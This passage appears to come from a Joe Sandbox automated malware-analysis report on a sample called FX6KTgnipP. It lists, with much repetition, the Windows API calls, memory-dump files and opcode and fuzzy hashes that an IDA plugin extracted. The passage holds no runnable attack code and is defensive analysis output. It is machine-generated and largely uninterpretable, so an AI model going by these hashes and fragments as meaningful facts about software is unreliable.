                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                            • String ID: I=uqI&
                                                                                                                                                                            • API String ID: 1269201914-3646153225
                                                                                                                                                                            • Opcode ID: 72bad791e7d123aba9f4bb222354b2eb4cde10dd7265dee5661e0e2ca794a80a
                                                                                                                                                                            • Instruction ID: 2ca98cb7b6b4c0dbf38014df072c1f56a9e4af637b971e3cbc2c2f53c56fd65e
                                                                                                                                                                            • Opcode Fuzzy Hash: 72bad791e7d123aba9f4bb222354b2eb4cde10dd7265dee5661e0e2ca794a80a
                                                                                                                                                                            • Instruction Fuzzy Hash: 3EA0019A6BE112BC320872617E07C3B421DC6D6BA13318A1AF882C6886A8819AF51531
                                                                                                                                                                            APIs
                                                                                                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00264918
                                                                                                                                                                              • Part of subcall function 00264FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00265041
                                                                                                                                                                              • Part of subcall function 00264FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00265052
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                            • String ID: I=uqI&
                                                                                                                                                                            • API String ID: 1269201914-3646153225
                                                                                                                                                                            • Opcode ID: 3bbc0e4a92e756519c09b582bda40c1ed311b4aac8f5e1b1738779c3b4b8b16b
                                                                                                                                                                            • Instruction ID: 2ca98cb7b6b4c0dbf38014df072c1f56a9e4af637b971e3cbc2c2f53c56fd65e
                                                                                                                                                                            • Opcode Fuzzy Hash: 3bbc0e4a92e756519c09b582bda40c1ed311b4aac8f5e1b1738779c3b4b8b16b
                                                                                                                                                                            • Instruction Fuzzy Hash: 3EA0019A6BE112BC320872617E07C3B421DC6D6BA13318A1AF882C6886A8819AF51531
                                                                                                                                                                            APIs
                                                                                                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00264918
                                                                                                                                                                              • Part of subcall function 00264FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00265041
                                                                                                                                                                              • Part of subcall function 00264FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00265052
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                            • String ID: I=uqI&
                                                                                                                                                                            • API String ID: 1269201914-3646153225
                                                                                                                                                                            • Opcode ID: c382e0acba1aef4604ddcef52366a26f803788a0a41b6e06ade23f90e976b86e
                                                                                                                                                                            • Instruction ID: 2ca98cb7b6b4c0dbf38014df072c1f56a9e4af637b971e3cbc2c2f53c56fd65e
                                                                                                                                                                            • Opcode Fuzzy Hash: c382e0acba1aef4604ddcef52366a26f803788a0a41b6e06ade23f90e976b86e
                                                                                                                                                                            • Instruction Fuzzy Hash: 3EA0019A6BE112BC320872617E07C3B421DC6D6BA13318A1AF882C6886A8819AF51531
                                                                                                                                                                            APIs
                                                                                                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00264918
                                                                                                                                                                              • Part of subcall function 00264FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00265041
  • Part of subcall function 00264FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00265052
Strings
Memory Dump Source
• Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
• Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID: I=uqI&
• API String ID: 1269201914-3646153225
• Opcode ID: dfbf03dd951d04ee1c2135d5de8b2242ea83c1318053ea12d4dbdebfb7787cd9
• Instruction ID: 2ca98cb7b6b4c0dbf38014df072c1f56a9e4af637b971e3cbc2c2f53c56fd65e
• Opcode Fuzzy Hash: dfbf03dd951d04ee1c2135d5de8b2242ea83c1318053ea12d4dbdebfb7787cd9
• Instruction Fuzzy Hash: 3EA0019A6BE112BC320872617E07C3B421DC6D6BA13318A1AF882C6886A8819AF51531
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 00264918
  • Part of subcall function 00264FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00265041
  • Part of subcall function 00264FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00265052
Strings
Memory Dump Source
• Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
• Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID: I=uqI&
• API String ID: 1269201914-3646153225
• Opcode ID: dbd16f702ed53e343c10a2c0bbbc783cc76de492a34cb883a7d207814efe1ca4
• Instruction ID: 2ca98cb7b6b4c0dbf38014df072c1f56a9e4af637b971e3cbc2c2f53c56fd65e
• Opcode Fuzzy Hash: dbd16f702ed53e343c10a2c0bbbc783cc76de492a34cb883a7d207814efe1ca4
• Instruction Fuzzy Hash: 3EA0019A6BE112BC320872617E07C3B421DC6D6BA13318A1AF882C6886A8819AF51531
APIs
• SetFilePointer.KERNELBASE(000000FF,?,?,?,?,00000000,?,00000000,0024E3B1,?,?,00000000,?,?,0024CC21,?), ref: 0024E55F
• GetLastError.KERNEL32 ref: 0024E56E
Memory Dump Source
• Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
• Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
Similarity
• API ID: ErrorFileLastPointer
• String ID:
• API String ID: 2976181284-0
• Opcode ID: 977198a6b2e7ff237713aae21aa89916a1ad13ce60383dc727af14b6c51c7ab2
• Instruction ID: 4a018b386e18990e21743ca65ab7c5eeb3bf1181aa24503267deb82d71970a6a
• Opcode Fuzzy Hash: 977198a6b2e7ff237713aae21aa89916a1ad13ce60383dc727af14b6c51c7ab2
• Instruction Fuzzy Hash: A0411770624352CBEF28EF24D4846AAB3E5FF58720F56451DD98583241E7B4DCA08BA1
APIs
• FlushFileBuffers.KERNEL32(?), ref: 0024E78C
• SetFileTime.KERNELBASE(?,?,?,?), ref: 0024E840
Memory Dump Source
• Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
• Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
Similarity
• API ID: File$BuffersFlushTime
• String ID:
• API String ID: 1392018926-0
• Opcode ID: 396cd5ab528a9fe570eb363a5cbb7fdc5c435cf84aa9c474a80cbd126bb796fb
• Instruction ID: 49ced95f5f9ae551a83a09fbb513afc32c21a289291f10ea0884fb7414506474
• Opcode Fuzzy Hash: 396cd5ab528a9fe570eb363a5cbb7fdc5c435cf84aa9c474a80cbd126bb796fb
• Instruction Fuzzy Hash: D921D231269242ABEB18DE34C895AABFBE8BF95314F05491CF4C583181D329D92CDB62
APIs
• SetFilePointer.KERNELBASE(000000FF,00000000,00000000,00000001), ref: 0024E897
• GetLastError.KERNEL32 ref: 0024E8A4
Memory Dump Source
• Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
• Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
Similarity
• API ID: ErrorFileLastPointer
• String ID:
• API String ID: 2976181284-0
• Opcode ID: 00d25e91e1088def1c83594128ec06b69e82db023d175fccb586d65f33fc40b0
• Instruction ID: 7b85a0f53a389baf82432ae56e547a849f40f01804af6fe1e4ee8e05c9be4753
• Opcode Fuzzy Hash: 00d25e91e1088def1c83594128ec06b69e82db023d175fccb586d65f33fc40b0
• Instruction Fuzzy Hash: 7D11E530620601AFFF289A34CC44B6673E9BB45370F610B28E052925E0D7B0ED65DB60
APIs
• __EH_prolog3_GS.LIBCMT ref: 00241CE9
• GetDlgItem.USER32(?,?), ref: 00241D01
  • Part of subcall function 002414A7: _wcslen.LIBCMT ref: 002414B8
Memory Dump Source
• Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
• Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
Similarity
• API ID: H_prolog3_Item_wcslen
• String ID:
• API String ID: 896027972-0
• Opcode ID: 92900af006ad936717577b1929acd37a2d721978145ae224250639c2256d7a38
• Instruction ID: 22c144b3f240731f5df0e523ee7300f2eb5ea82fe16d4b500c5457d57065c64e
• Opcode Fuzzy Hash: 92900af006ad936717577b1929acd37a2d721978145ae224250639c2256d7a38
• Instruction Fuzzy Hash: AF0184B1A21214DFD729EF64C886BEDB7E8AF58740F54010AF856A72D1D7705AB1CF10
APIs
  • Part of subcall function 00272BE0: GetEnvironmentStringsW.KERNEL32 ref: 00272BE9
  • Part of subcall function 00272BE0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00272C0C
  • Part of subcall function 00272BE0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00272C32
  • Part of subcall function 00272BE0: _free.LIBCMT ref: 00272C45
  • Part of subcall function 00272BE0: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00272C54
• _free.LIBCMT ref: 0026F16A
• _free.LIBCMT ref: 0026F171
Memory Dump Source
• Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
• Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
Similarity
• API ID: _free$ByteCharEnvironmentMultiStringsWide$Free
• String ID:
• API String ID: 400815659-0
• Opcode ID: e20f88ee281890ce14d08cb5642a795eb5ab9cc5afc976431b60f66aa54bbd39
• Instruction ID: b456d494711b724f702634e2479e3e1062e9e6fe2f9b8762be21e827ac254415
• Opcode Fuzzy Hash: e20f88ee281890ce14d08cb5642a795eb5ab9cc5afc976431b60f66aa54bbd39
• Instruction Fuzzy Hash: 9FE0EC12E39501D6DAA1373A7E4571A12504B833B0B1103F6F42CE60D2CEB448A54595
APIs
• GetCurrentProcess.KERNEL32(02000000,?,00000002,00000002,?,002576EA,00250B6F), ref: 002576B4
• GetProcessAffinityMask.KERNEL32(00000000,?,002576EA), ref: 002576BB
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Process$AffinityCurrentMask
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1231390398-0
                                                                                                                                                                            • Opcode ID: d5ac51ad928270a018e1eb25ab4053b090f7d651b2028751118d31af85267ce1
                                                                                                                                                                            • Instruction ID: f4fe0480863b00b449aa17db8ed24baaf763548e6b07b4451ae1ecfa09bb2e87
                                                                                                                                                                            • Opcode Fuzzy Hash: d5ac51ad928270a018e1eb25ab4053b090f7d651b2028751118d31af85267ce1
                                                                                                                                                                            • Instruction Fuzzy Hash: 30E09232B65507A78F198BB9AC099EB729DAA442453244079A813D3200E974DD0946A4
                                                                                                                                                                            APIs
                                                                                                                                                                            • GdiplusShutdown.GDIPLUS(?,?,?,?,00279B73,000000FF), ref: 0025F578
                                                                                                                                                                            • CoUninitialize.COMBASE(?,?,?,?,00279B73,000000FF), ref: 0025F57D
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: GdiplusShutdownUninitialize
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3856339756-0
                                                                                                                                                                            • Opcode ID: b57a45844c42b55dc05a91fc054a893e2c9c6630ef877556fbfecef295c17267
                                                                                                                                                                            • Instruction ID: 488c81ce11589afe6a2025f0f31b93313e5308305c514a6054a0831271379a53
                                                                                                                                                                            • Opcode Fuzzy Hash: b57a45844c42b55dc05a91fc054a893e2c9c6630ef877556fbfecef295c17267
                                                                                                                                                                            • Instruction Fuzzy Hash: 73F08276608A54AFC701DF69FC45B5AFBE8FB49770F00426AE81AC3760CB75A840CB94
                                                                                                                                                                            APIs
                                                                                                                                                                            • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 0025E86A
                                                                                                                                                                            • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 0025E871
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: BitmapCreateFromGdipStream
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1918208029-0
                                                                                                                                                                            • Opcode ID: fe73752429b0b38da8e5128afa319f9813a652a1cd534ad4855323b53349b2c1
                                                                                                                                                                            • Instruction ID: 559a358ae5d31b675beea9bbed876681f08f0931c51345476c7689df1a5a00d6
                                                                                                                                                                            • Opcode Fuzzy Hash: fe73752429b0b38da8e5128afa319f9813a652a1cd534ad4855323b53349b2c1
                                                                                                                                                                            • Instruction Fuzzy Hash: 9DE09271420218EFCB10DF49C80579DB7F8EF04351F20C05AA88993211D7B0AF54DF90
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ItemShowWindow
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3351165006-0
                                                                                                                                                                            • Opcode ID: 6d0c8497c998e0af664e4a75c2913ff314c3be38866fef69b3a15122172d264d
                                                                                                                                                                            • Instruction ID: 1453bbe3ed388d3956049b29022169ba289bfbf42d0800ed4ccbfcb98409447d
                                                                                                                                                                            • Opcode Fuzzy Hash: 6d0c8497c998e0af664e4a75c2913ff314c3be38866fef69b3a15122172d264d
                                                                                                                                                                            • Instruction Fuzzy Hash: 68C0123206C200BFCB010BB0EC0DD2EBBA8ABA4212F00CA0AB0A9C0060C239C010DB11
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetDlgItem.USER32(?,?), ref: 00241CD2
                                                                                                                                                                            • KiUserCallbackDispatcher.NTDLL(00000000), ref: 00241CD9
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CallbackDispatcherItemUser
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 4250310104-0
                                                                                                                                                                            • Opcode ID: 3a74e129bd6b1763d4e0debca2948a52d1d83d0f5cd70b66980650c22ccc6b80
                                                                                                                                                                            • Instruction ID: 0221722e77c6aea6de5c9a2d8c338dfd2b34529ae0b1167d69dafbfed2caf189
                                                                                                                                                                            • Opcode Fuzzy Hash: 3a74e129bd6b1763d4e0debca2948a52d1d83d0f5cd70b66980650c22ccc6b80
                                                                                                                                                                            • Instruction Fuzzy Hash: EAC04C7641C240BFCB015BA0AD1CC2FBFA9AB95311F00C94AB5A980120C6368410DB11
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: H_prolog3
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 431132790-0
                                                                                                                                                                            • Opcode ID: 8268776aed72606a46e226840eb24fb836350dd2e1f93d427ffc1be92f7cf425
                                                                                                                                                                            • Instruction ID: 3461a8cb2039dc7919c2a5658fc0069a74f35da39393ba2dc52f9e408ac5fb49
                                                                                                                                                                            • Opcode Fuzzy Hash: 8268776aed72606a46e226840eb24fb836350dd2e1f93d427ffc1be92f7cf425
                                                                                                                                                                            • Instruction Fuzzy Hash: 0FC19030A24256DBDF29DF66C8947AD7BE4AF09300F5840B9FC05DF286C7709869CBA1
                                                                                                                                                                            APIs
                                                                                                                                                                            • __EH_prolog3.LIBCMT ref: 002420B7
                                                                                                                                                                              • Part of subcall function 002480EC: __EH_prolog3.LIBCMT ref: 002480F3
• Part of subcall function 00252815: __EH_prolog3.LIBCMT ref: 0025281C
• Part of subcall function 002476E7: __EH_prolog3.LIBCMT ref: 002476EE
Memory Dump Source
• Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
• Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
Similarity
• API ID: H_prolog3
• String ID:
• API String ID: 431132790-0
• Opcode ID: 84c43928ac99fd661ad9710aff5e64db91db7d5091d0afddf6c17080f196fb39
• Instruction ID: a15a8e4f203bcc384e5745d978669e7077b3db8ff62651e3ade2bffdff6d179c
• Opcode Fuzzy Hash: 84c43928ac99fd661ad9710aff5e64db91db7d5091d0afddf6c17080f196fb39
• Instruction Fuzzy Hash: 6951E4B1A15780CEDB49DF6A84807C9BBE0AF59300F0881BAEC4DDE69BD7744254CB61
APIs
• __EH_prolog3_GS.LIBCMT ref: 0024B3E8
• Part of subcall function 0024F711: FindClose.KERNELBASE(00000000,000000FF,00000049,00000049,?,?,0024A684,?,?,00000000,?,?,?,?,?,?), ref: 0024F739
Memory Dump Source
• Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
• Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
Similarity
• API ID: CloseFindH_prolog3_
• String ID:
• API String ID: 2672038326-0
